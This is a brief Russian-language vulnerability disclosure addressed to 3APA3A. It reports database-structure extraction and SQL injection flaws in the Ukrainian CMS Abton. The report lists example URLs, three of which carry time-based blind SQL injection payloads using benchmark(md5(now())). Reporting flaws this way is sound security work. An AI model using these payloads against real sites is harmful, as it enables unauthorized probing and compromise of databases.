Здравствуйте 3APA3A!
Сообщаю вам о найденных мною SQL DB Structure Extraction и SQL Injection уязвимостях в Abton (это
украинская CMS).
SQL DB Structure Extraction:
http://site/rus/details/13220/
http://site/rus/referaty/1/-1/
SQL Injection:
http://site/rus/details/’+benchmark(10000,md5(now()))+’/
http://site/rus/referaty/1?+benchmark(10000,md5(now()))-’1/
http://site/rus/’+benchmark(10000,md5(now()))+’/
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2886/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua